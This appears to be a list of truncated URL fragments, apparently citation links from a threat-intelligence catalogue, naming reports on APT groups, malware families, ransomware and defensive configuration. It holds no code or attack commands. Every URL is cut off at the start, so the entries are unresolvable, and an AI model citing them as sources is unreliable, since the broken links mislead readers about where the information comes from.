us-lazarus-group-incorporating-lolbins-into-campaigns
oles-against-enterprises.html
e-emerging-threat-profile-shell-crew.pdf
5009/HTA-F02-Detecting-and-Responding-to-Advanced-Threats-within-Exchange-Environments.pdf
5/2015.11.04_Evolving_Threats/cct-w08_evolving-threats-dissection-of-a-cyber-espionage-attack.pdf

geted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/
new-custom-malware-to-attack-southeast-asia/
-users-with-fake-w2-form/
ro-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/
nam-and-india/

s-computers-ukraine
ection-Report.pdf?mkt_tok=MDAzLVlSVS0zMTQAAAF_PIlmhNTaG2McG4X_foM-cIr20UfyB12MIQ10W0HbtMRwxGOJaD0Xj6CRTNg_S-8Kn

are-outbreak/

bs/magecart-british-airways-breach/
log/labs/cobalt-group-spear-phishing-russian-banks/
log/labs/cobalt-strike/
log/labs/magecart-newegg/
log/labs/spear-phishing-turkish-defense-contractors/
ation-framework/

eport-S2-Grupo.pdf
-5f436e04b20d
-whitelisting-panacea-propaganda-33599
urity-resources/malwarefaq/conficker-worm
e-1554718868.pdf

ng/V-91779
to-send-swat-teams-to-fred-hutch-patients-homes.html
nical-analysis/
/windows/netexe-reference
s-long-espionage-targets-minority-activists/

/blog/winexe/

hould-be-on-your-mind.html

its-activities/90703/

ing-technique/85431/
-east-campaign
erations-use-hui-loader

discovered-in-a41apt-campaign/101519/

g-zero-day-exploit/82732/
an-and-carbanak-2-0-attacks/73638/

blermicrobackdoor.pdf

-harvester/90729/

ovement-using-at-exe-on-windows-7-systems

e-silhouette-targets-us-government-and-defense-organizations

s-universities

-organizations

or-emotet-smb-spreader

ensnare-the-big-financial-fish

energy-sector

erages-us-elections-lure

ets-energy-sector

bout-the-latest-global-ransomware-attack
m-users-won%E2%80%99t-hide-or-delete-their-bashhistory

-is-behind-op-aurora-and-ongoing-attacks.html
ttrinity-malware.html
g08-strikes-again/
n-impacts-many-countries-using-a-sophisticated-loader/

s-and-ntfs-file-attributes/

bV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm
alicious-run-only-applescripts/

se-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/
tion-and-defense-as-new-samples-rapidly-emerge/
nalysis-internals-2/
platform-expands-its-search-for-high-value-targets/

are-target-apples-macos-platform/
rgeted-backdoor-macos-macma/
rgeted-backdoor-macos-macma/
e-used-in-supply-chain-attacks/
-malware-staging-infrastructure-to-counter-defenders/

lobal-espionage/
files-with-double-extension/
heat_Sheet.html

k-on-the-trail-of-sandworm/
y-real-threat-very-fake-update
s-dealerschoice-target-european-government-agency/
mplex-os-x-trojan/
ered-targeting-seagate-nas-hard-drives-508119.shtml

-investigation-of-sunburst/

s-not-merely-a-byproduct-of-bad-luck/
oad-delivery-options/
r-locker-virtual-machine-technique/
s-give-insight-into-threat-actor/

eploys-virtual-machine-to-dodge-security/
Sam-ransomware-chooses-Its-targets-carefully-wpna.pdf

ets/resources/Certified_Pre-Owned.pdf
efenses-6f98657fc6ec
are-solarwinds-continued.html
-increases-sophistication-and-evasion-in-ongoing-attacks/
rep-roasting/
hreats/pdfs/rpt-dll-sideloading.pdf

%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&_

tary-government

20623-0740-99&tabid=2
20123-5521-99

/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf
51515-2843-99
p-shifts-gaze-us-hong-kong
bumblebee-loader-cybercrime
m/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days
center/writeup.html/2018-040209-1742-99
-door-threats-spy-middle-eastern-targets
chafer-latest-attacks-reveal-heightened-ambitions
cicada-apt10-japan-espionage
ttacks-telecoms-africa-mgbot
rfly-espionage-updated-toolset
81910-3934-99
mmunity-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-954
gy_suppliers
ponse/whitepapers/dyre-emerging-threat.pdf
m/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

rojan-distributor
syssphinx-fin8-backdoor
der-and-back-door

11114-1830-99

inception-framework-hiding-behind-proxies
e-middle-east
51605-2535-99

61518-4639-99
51515-3445-99
s-healthcare-us-europe-asia
4/Orangeworm%20IOCs.pdf
palmerworm-blacktech-espionage-apt
50412-4128-99
up-expands-targets-governments-wide-range-industries
solarwinds-raindrop-malware
ponse/whitepapers/Symantec_Remsec_IOCs.pdf
51515-3909-99

est-weapon-duke-armory

shuckworm-gamaredon-espionage-ukraine
p-targets-south-american-and-southeast-asian-governments
ur-code-signing-certificates
suckfly-attacks
solarwinds-sunburst-sending-data
elecoms-defense-targets

tortoiseshell-apt-supply-chain

ukraine-wiper-malware-russia
51606-5938-99
m/security-center/writeup/2014-081811-3237-99?tabid=2
sponse/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
wastedlocker-ransomware-us
y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1
e-governments
whitefly-espionage-singapore
51606-1005-99

tections-by-accident-and-design/
tform-Module-Summary_04292008.pdf
ckdoor-Base-On-Dropbox-en/
new-rtf_15.html

sorder.html
site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf
of-apt.html

-malware.html
or-years.html
tion-chain.html

ets-turkey.html
d-blackwater.html

ongpity3.html

netting-over.html

earned-new.html#more
ts-weblogic.html

rgeting.html

ses-scheduled-tasks-for-defense-evasion/

et-ii-windows-defender-exploit-guard/
on/secure-the-windows-10-boot-process

ttings-via-group-policy/

chrome-group-policy-settings/

ect-sodinokibi-ransomware-analysis

st-two-64-bit-derusbi-strains-converge
p-attempts-to-evade-analysis-via-custom-rop

qu/119725/
Attacks-and-Mitigation-Techniques.pdf
s-how-to-prevent-detect-and-respond-to-cloud-token-theft/
arkgate-malware-as-a-service/

ght/ransomware-spotlight-avoslocker
-malware-uses-network-sniffing-for-data-theft/
basta-ransomwares-infection-routine.html
networks-via-qakbot-brute-ratel-and-coba.html
ght/ransomware-spotlight-blackbasta
omware-cheerscrypt-targets-exsi-devices.html

hts-on-asus-routers--.html
DRBcontrol.pdf
-bronze-butler-daserf-backdoor-now-using-steganography/
tsActivities_Final.pdf
ommerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html
white-papers/wp_ixeshe.pdf
s-toolkit-with-evolved-sysupdate-malware-va.html
ts-latin-american-financial-organizations-again.html
its-financial-organizations-in-latin-america.html
-connected-to-oceanlotus-surfaces.html
water-continues-to-target-organizations-in-t.html
ed-attack-chain-involving-ngrok.html

abuses-open-authentication-advanced-social-engineering-attacks

ital-threats/qakbot-resurges-spreads-through-vbs-files

ght/ransomware-spotlight-play
pands-attacks-by-targeting-linux-esxi-servers.html
x-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
s-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/
-activities-of-teamTNT.pdf
K-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf
y_trickload.n
ws-off-new-trick-password-grabber-module/
s-api-hooking-to-evade-security-product-detection.html
ital-threats/new-multi-platform-xbash-packs-obfuscation-ransomware-coinminer-worm-and-botnet
ed-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/
DR_URSNIF.SM?_ga=2.129468940.1462021705.1559742358-1202584019.1549394279
l-blacktech-cyber-espionage-campaigns/
runs-use-macros-cve-2017-8759-exploit/
us-spyware-related-lures-to-target-pakistani.html
s-cyberespionage-operations.html

ch/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-l
pt-group-use-covid-19-lure-in-campaigns/
uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/
nues-heists-mounts-attacks-on-financial-organizations-in-latin-america/
ackdoor-linked-to-oceanlotus-found/
windows-installer-msiexec-exe-leads-lokibot/
eless-ransomware-injected-via-reflective-loading/
aissance-tactics-hint-at-next-targets.html
URSNIF.A2?_ga=2.131425807.1462021705.1559742358-1202584019.1549394279
resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/
hwork-cyberespionage-group.pdf
-in-2019.pdf
ophistication-as-a-strategy.html
pam-wave-campaign.html
are-targets-telecom-governments.html
%20Brief.pdf
f-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/
ety-is-the-spice-of-servhelper-and-flawedammyy.html
white-papers/wp_the_taidoor_campaign.pdf

-remote-application-credential-grabbing-capabilities-to-its-repertoire/
r-new-strategy/
ack-USBferry-Attack-Targets-Air-gapped-Environments.pdf

file-infector-hits-us-uk/
com/en_us/research/15/c/ursnif-the-multifaceted-malware.html?_ga=2.165628854.808042651.1508120821-744063452.1505819992
acls-rat-backdoor-show-lazarus-multi-platform-attack-capability/
volving-thiefquest-macos-malware.html
tors-abuse-google-ppc-to-distribute-malware.html
nc-module-for-high-value-targets/
ngerous-malware/

munications-are-essential-for-incident-response
/sites/default/files/Carberp_Analysis.pdf
light-on-Cherry-Picker-PoS-Malware/
en-tax-department-and-the-emergence-of-goldenspy-malware/
nspy-chapter-two-the-uninstaller/
wmint-fin7s-monkey-thief/

ber_server/2013-07-25/finding/WN12-CC-000077
ver/2015-06-25/finding/V-26482
r-attacks-against-olympic-and-paralympic-games

B_WHITE.PDF

11.WHITE.pdf
Best-Practices
D_WHITE_S508C.PDF

and-Electricity-Information-Sharing-and.pdf
med-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046
ting-government-and-military-organizations/

lware-used-attacks-russia-south-korea/
d-to-c0d0s0-group/
government-targeted-in-spear-phishing-attacks/
n-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/
iques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/
-actor-group-darkhydrus-targets-middle-east-government/
update-2021/
up-slithering-nation-state-cybercrime/

urope-year-old-office-vulnerability/

tiplatform-espionage-backdoor-api-access/
er-kerrdown/
hybrid-malware/
nd-campaign-attacks-saudi-targets/
ounder-used-by-chafer/
the-water-targeted-attacks-in-the-middle-east/

-malware-attacking-eurasia-southeast-asia/
st-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/
ts-middle-eastern-government-adds-evasion-techniques-oopsie/
g-uses-threedollars-deliver-new-trojan/

s-uses-phishery-harvest-credentials-middle-east/

n-pakistani-actor-and-operation-transparent-tribe/
ts-technology-service-provider-government-agency-quadagent/
rgdoor-iis-backdoor-targets-middle-east/
es-to-evade-detection-by-cloud-security-products/
nalysis-seaduke/
cks-multiple-government-entities/

per-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/
asar-rat-custom-malware-used-ukraine/

48-whispergate/#whispergate-malware-family

h-higher-ed-sectors/
old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/
s-continue-using-kimjongrat-and-pcrat/
-national-security-think-tanks/

tinues-global-attacks-wheels-new-cannon-trojan/

-exchanges-cookies/
t-can-use-google-drive-for-c2-communications/
-government-sharepoint-servers/

oor-oceanlotus/
esting-weaponization-delivery/

redaman-banking-malware/

reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf
?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise

bines-botnet-ransomware-coinmining-worm-targets-linux-windows/

rm-now-targets-esxi-systems

ter-russias-vpnfilter-malware/

white-papers/wp_dissecting-lurid-apt.pdf
uky-group-tracking-king-spearphishing/
bercrime-group-expands-threat-To-ecommerce-merchants.pdf

oft-exchange-zero-day-vulnerabilities/
nfects-victims-using-browser-exploits/
al-inkysquid-deploys-rokrat/
ploitation-goes-global/
ro-day-vulnerabilities-in-ivanti-connect-secure-vpn/
espionage-operations-through-fake-websites/
igital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
-us-think-tanks/
ear-phishing-campaigns-targeting-think-tanks-and-ngos/
ds-compromise-to-breach-organizations/

based-on-power-loader-code/
ws-commands/wevtutil

curity-policy-settings/network-access-do-not-allow-anonymous-enumeration-of-sam-accounts-and-shares
soft-edge-sandbox/

sofacys-xagent-macos-tool/

er-delivering-cobalt-strike
nsion-to-infect-victims/
of-the-un-security-council/
otnet-behind-ever-shifting-proxy-service/
19-vaccine-theme-and-abuses-legitimate-online
rs-buer-and-bazar-malware

new-features-in-os-x-mavericks/
-me-24fc0f49cad1

a-getting-a-foothold-in-under-5-minutes.html
uration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436
downloads/csmanual38.pdf
curity-policy-settings/create-symbolic-links

ows-server-2012-R2-and-2012/dn800668(v=ws.11)
-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc
ent-threat-to-the-hph-tlpclear.pdf
adopts-binary-padding-for-evasion.html
tion_of_pirpi.pdf

rs.com/2014/10/cve-2014-4114/
ng-techniques

nese-government-and-fossil-fuel-provider-with-poison-ivy/
ence-156e2b40fc67
top/reagentc-command-line-options?view=windows-11
ay-not-be-ransomware-after-all/
named-fork/
ates-on-crimeware-scripting-technique/
r-to-zshlayer/

curity-policy-settings/store-passwords-using-reversible-encryption

-macos-mm-install-macos.html

-aka-redcurls-cyberespionage-tactics-with-t.html

ttack-surface-reduction

-to-psexec/
ative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/
hniques-technical-survey-common-and-trending-process
g-truly.html
based-on-power-loader-code/

ew-backdoor-targets-french-entities-unique-attack-chain
nding-against-scheduled-task-attacks-in-windows-environments

ses-scheduled-tasks-for-defense-evasion/
diting/audit-other-object-access-events

1053.005/T1053.005.md

ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen
registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
of-the-scheduled-tasks-folder

d-justforfun-implant/
nical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

ning-vnc-software-apdbed09830/mac

-without-authentication

1e/src/grd-settings.c#L207
1e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
abilities-found-in-linux-windows-solutions/

em-Authentication
d-crack-d3d18a4601cc
hreats/pdfs/wp-windows-management-instrumentation.pdf

ves-of-blackcat-ransomware/
ge?redirectedfrom=MSDN
mand-line-wmic-utility-deprecation-next-steps/ba-p/4039242
pyfromscreen?view=netframework-4.8
oor-using-antiquated-code/
ng-services-applications/
y-executed-from-shared-memory-directory.html

pabilities-log4shell
ware-family-written-in-golang

25/how-dns-changer-trojans-direct-users-to-threats
s-firewall-exploitation-and-an-insidious-breach/

s-how-to-prevent-detect-and-respond-to-cloud-token-theft/
wngrade-attack/

ough-2-0-day-vulnerabilities/
-book/sec-cr-s5.html

ogy-report-how-to-catch-nso-groups-pegasus/

an-c448d501a6e2

ng-network-scan-data-and-automation

white-papers/wp-cpl-malware.pdf

d-control-in-the-cloud/
abuses-cloudflare-workers-for-c2-communication/
e-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette

somware-injected-via-reflective-loading.html

ink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1
alicious-run-only-applescripts/
alicious-run-only-applescripts/
/wiki/PasswordDatabase.PAM.txt

x/6/html/managing_smart_cards/pluggable_authentication_modules

-restoring-snapshots-on-amazon-ec2-machines/

nce-framework-used-on-watering-hole-attacks
are-distribution/

server-site-url-bcfc41ea46a2
-malware.html
get-legacy-devices/ba-p/4169954
of%20a%20Keystroke.pdf
oint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus
acaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110
s-threat-actors-malware/
ital-threats/emotet-now-spreads-via-wi-fi
/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

ws-commands/pubprn

illion-user-records-on-the-dark-web/
s-from-memory-558f16dce4ea

asids-oh-my/
orlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf

ols/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html
oor-oceanlotus/
namic-link-library

ulletin/cisco-amb-20080610-SNMPv3

and/cf_command_ref/F_through_K.html#wp2829794668
return-disttrack-wiper/

018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

n/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
nary-guard-corps-affiliated-entities-charged
fication-of-environment-variable-via-launchctl.html
ility-in-windows/

nment-variable/
e-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
n/Invoke-NinjaCopy.ps1
s-Directly-from-Disk-usin

ad-of-threat-actors-in-the-age-of-ai/
ed-threat-actors/
g-started_concepts.html
432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
unt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
y/azure-setup-guide/organize-resources
storm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
ceive-mlhlp1017/mac
-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/
il-flow-rules/mail-flow-rules
sing-rules-c24f5dea-9465-4df4-ad17-a50704d66c59
oxrule?view=exchange-ps
xrule?view=exchange-ps
y/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154
s/ib-entertainment.pdf
andia-033017.pdf
protest-web-blocking-nsfw-180512/
-into-defacement.pdf
sing-flash-update-disguise/
d-their-hidden-payloads/

de_Infrastructure_Security_Report.pdf

ou-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf
d-privilege.html

eat-Sheet-ver-June-2016-v2.pdf
ell.core/about/about_profiles?view=powershell-6
e/about/about_profiles
tilities/Conceptual/MacAutomationScriptingGuide/index.html
with-vscode-extensions/
-javascript-ecmascript

thout-building-binaries/

axfr-requests-may-leak-domain-information

/blog/russian-tlds
e-mgmt.html

ment-policy-configure?tabs=azure-portal
-protection-cloud/
on.cloudtrail-lifecycle-rule/

nceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

co-web-vpns-leveraged-for-access-and-persistence/

malware-variants-target-exposed-docker-servers.html

ad-A-Malware-For-OS-X.pdf
s-bookmarks/
-exchanges-cookies/
thms-a5b5dbdc1c6e
ms-effective/
sis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
generation-algorithms-dga/

e-extension/
files-with-double-extension/

er-account-control-works

e-and-registry-hijacking/

levate-privilege-for-fareit-malware

lware-intercepts-web-traffic/
-actually-does
t-part-2.pdf

orized-disruption-botnet-controlled-russian

ack-how-attackers-are-hijacking-search-results/
oss-google-ads-is-distributing-dangerous-malware/
threat-actors-targeting-organizations-gpus-42ae73ee8a1e

dhound-to-the-rescue/

d-office-365-mail-forwarding-2/
munications-are-essential-for-incident-response

disclosure-scanning/
blog/copernicus-question-your-assumptions-about
T-UEFI-rootkit.html
os-with-mitre-firmware-security-research

enumerate-users-and-discover-sensitive-information-361a5065857a
cords-exposed-online/

rectory-leaks-via-azure/

role?view=azureadps-1.0

ors-and.html

curity-and-access-rights?redirectedfrom=MSDN
-system-currentcontrolset-services-registry-tree

ital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets
se-ca-servers-103112/77170/

s-ssl-certificates.html

ed-by-malicious-actors/
and/cf_command_ref/D_through_E.html#wp3557227463
ster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000

etadata.html

l-one-hack/

ceptual/Security_Overview/Architecture/Architecture.html

hungry-credentials/

ws-commands/gpresult

02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
s/rpt-mtrends-2016.pdf
and-evolution

om/darkwatchman-new-fileless-techniques/

eb_v5-1.pdf

-ost-file-sizes/
s-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790

d6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py

Dive-into-Apple-Keychain-Decryption
ys-and-search-order

once-registry-keys

Attacks-and-Mitigation-Techniques.pdf
mping/dumping-lsa-secrets
eged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN

-nation-state-cyberattacks/
directory-configurable-token-lifetimes
nt-nation-state-cyber-attacks/
newly-discovered-attack-technique-forges-authentication-to-cloud-apps

ockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
iant-apt1-report.pdf
oolset/72924/
-operation-let-attackers-sabotage-us-energy-industry/
b-devices-to-install-ransomware/

of-registry-trees-and-keys
mmands/driverquery

istence-mechanisms.pdf
elations-water-hole-attack-details.html

nese-government-and-fossil-fuel-provider-with-poison-ivy/

ab-Analysis-OSX-Pirrit-4-6-16.pdf
ata-streams/
mplex-os-x-trojan/
eploys-virtual-machine-to-dodge-security/

dde-feature-in-word-to-prevent-further-malware-attacks/

e-execution-d7226864caee

containing-password-protected-word-docs/
pts/160158/
tt-messaging-protocol/

ogs/ADFSDomainTrustMods.yaml
y/update-federated-domain-office-365
ntion-and-detection

ons-against-koadic-using-eql
de-story-of-the-hbgary-hack/
orate-social-media-attack-operation
10-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
e-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234
-pcs-into-safe-mode-to-bypass-protection/
ws-commands/bcdedit
-to-domain-compromise
s-a-new-windows-safe-mode-encryption-mode/
mmands/bootcfg

ows-event-forwarding-to-assist-in-intrusion-detection

event-4697
_dossier.pdf

nst-wiper-malware-used-in-ukraine-attacks/
on-part-1/#gref
on-part-2/#gref

ts-middle-eastern-government-adds-evasion-techniques-oopsie/
-malware-fake-virtual-machine/

u/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

abuses-open-authentication-advanced-social-engineering-attacks
uthorization-flows-part-1
comprehensive-solution-to-battle-rise-in-consent-phishing-emails/
rity/anti-spoofing-protection?view=o365-worldwide

evice-code-flow-and-phishing
phishing-attacks

nd-remediate-outlook-rules-forms-attack
rules-and-forms-injection/
ersistence/13746

-33ea9b505943
rs-with-fake-login-pages

human-factor-report.pdf

rity-stop-month-qr-code-phishing
m-credentials
acker-in-aws/
n-roles?view=o365-worldwide

5-4bd0-a637-a81ce93de22d

n-to-print-processors

-actor-group-darkhydrus-targets-middle-east-government/
mat-101-part-2-symbols/

icks-exploiting.html
ateobject-method-and-dotnettojscript/
application-com-object/

ence-windows-registry.html

10/2269637
ry-redirection?redirectedfrom=MSDN
ry-search-order?redirectedfrom=MSDN

hijacking-revisited.html

wapping-ransomware

ws-commands/clip

1003.007/T1003.007.md

pid-maps-and-proc-usdpid-mem

ntial-dumping-technique-and-its-adversary-use
ction-to-the-discovery-of-the-anchor-malware

pplication-bundle-pretending-to-be-an-adobe-flash-update

ng-group-hacked-100-websites-to-use-as-watering-holes/
it-works.html
bedded-packet-capture/116045-productconfig-epc-00.html

tap-overview

a-and-big-sur-a-first-draft/
h-digital-certificates/68593/
ys-digital-certificates

loud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia

dos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/
nical-analysis/

hanges-windows-security-log/
/presentations/cds18-technical-s03-youve-got-mail.pdf
4fa9-9b88-403625a0b460
e-a-stealthy-office-persistence-technique

tNeuron.pdf
information.html

n-and-detection/

ce/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
ection-new-techniques-for-red-teams/
accounts.html

windows-installer-msiexec-exe-leads-lokibot/

ws-commands/msiexec

ectory-forests-rooted2019

m-port-11211/
ges-with-function-hooking/
ery-time-they.html

ws-system-services-fundamentals.aspx

Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html
for-attacking-macos/
-targets-macs/
pt-crypto-miner-detected/

s-to-impact-over-half-a-million-users-and-global-businesses
bs/archive/43824.pdf
tension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)
gBrazil/22722/
-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/
-friarfox-browser-extension-target-gmail-accounts-global
campaign-operating-covertly-since-2012/

mething-new

nceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1

stem-calls-and-srdi-to-bypass-av-edr/

hen-direct-system-calls-are-used/

ct-invocation-of-system-calls-for-red-teams/
/nf-processthreadsapi-createprocessa

rk-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/

on-linux-red-teams.html

e-entries-from-remote-desktop-connection-computer
her-the-RDPieces.pdf

roasting-activity-using-azure-security-center/

rep-roasting/

diting/event-4768
os-pre-authentication-why-it-should-not-be-disabled.aspx
Turla_20191021%20ver%204%20-%20nsa.gov.pdf

-of-the-darkgate-autoit-loader.html
/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
ell.core/about/about_history?view=powershell-7
ell-command-history-forensics
ws-error-reporting-tool-to-deploy-malware/

08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
ed-to-load-malware/

s-to-infect-android-devices-connected-to-pcs.html

p=rep1&type=pdf
and/cf_command_ref/show_protocols_through_showmon.html#wp2760878733
mpaign-using-multiple-exploits
ear-phishing-campaigns-targeting-think-tanks-and-ngos/
e/2017/03/new-targeted-attack-saudi-arabia-government/
l-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/
oft-exchange/

3886-espionage-operations
to-domain-wide-ransomware/
d-control-in-the-cloud/

g-delegated-administrative-privileges-to-facilitate-broader-attacks/
-actor-targeting-organizations-for-data-exfiltration-and-destruction/

dows-server-2012-r2-and-2012/cc754051(v=ws.11)
dows-server-2012-r2-and-2012/cc725622(v=ws.11)
dows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services

espionage-operations-through-fake-websites/

-possible-third-stage-that-had-keylogger-capacities

=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCS
m/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

windows-smb-server-could-allow-for-remote-code-execution/

ecurity_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

t-b4814285
mmands/klist

itation-in-the-wild-cve-2024-1709-cve-2024-1708
/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF

/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
eah-its-now-stealing-credit-cards/
rgeting.html

source-identifier-URI-exploits
ain-fronting/
/Presentation/bh-dc-08-mcfeters-rios-carter.pdf

log/labs/lazarus-group-cryptocurrency/
log/labs/ukraine-malware-infrastructure/

-Against-Malicious-Application-Compatibility-Shims-wp.pdf
/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf

ds-compromise-to-breach-organizations/
s%20Operation%20Cobalt%20Kitty.pdf

xchange-ps#mailboxes
auth-applications-used-to-compromise-email-servers-and-spread-spam/
nceptual/BPSystemStartup/Chapters/CustomLogin.html
ndowscripts

-to-hijack-browsers-in-github-attack
spionage-against-foreign-diplomats-in-belarus/
x/6/html/security_guide/chap-system_auditing
hreats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.

ges-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191
cret-war-on-discord

ctors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/

hooks/description.md

es-wake-on-lan-to-encrypt-offline-devices/

nnect-methods.html
-systems-manager.html

erial-console-overview

omping.html
g-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/

heory-evil-twin-and-karma-attacks-35a8571550ee
r-evil-twin-wifi-attack-on-plane/

aming-technique

net-tradecraft/

ultiplatform-backdoor/

w-wi-fi-spreader/
o-distribute-new-modular-powershell-toolkit/

ant-steals-wifi-credentials
swords-using-upgraded-agent-tesla-malware/
ely-operated-by-chinese-nation-state-actor/
ery-indicators-of-compromise/
vade+Detection/19429/

niffing-backdoor-ups-its-game

e/about/about_preference_variables?view=powershell-7.3#debugpreference

ged-container-in-docker-is-a-bad-idea.html
-infecting-docker-servers-in-the-cloud/
escape-using-linux-kernel-exploit/
tate-of-containerizing-linux-keyrings/
odified-for-persistence.html#shortcut-file-written-or-modified-for-persistence

can-exe-get/

-books/address-lists/address-lists?view=exchserver-2019
dresses-and-address-books/get-globaladdresslist

sive-malware-tricks-how-malware-evades-detection-by-sandboxes
s-supply-chain-exploit-to-attack-hundreds-of-businesses/
sandbox-analysis-technique

erver-2003/cc786431(v=ws.10)

and-uac-bypass-with-sysmon/

pr-11-security-incident
fense-evasion/t1562-impair-defenses/disable-windows-event-logging

curity-policy-settings/audit-policy
ws-commands/auditpol
5/status/1457316029114327040
1562.002/T1562.002.md
diting/advanced-security-audit-policy-settings
C27C82D23F183F9D23F1.html
ventlog-service-8d4b7d67335c
60ccbb7dff96

t-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem
movement-part-one-special-groups-and-specific-service-accounts

-evades-traffic-monitoring-via-dns-over-https/

white-papers/wp-cpl-malware.pdf
-files-used-as-malicious-attachments/
are-with-ties-to-sunorcal-discovered/

izations-for-cyberespionage
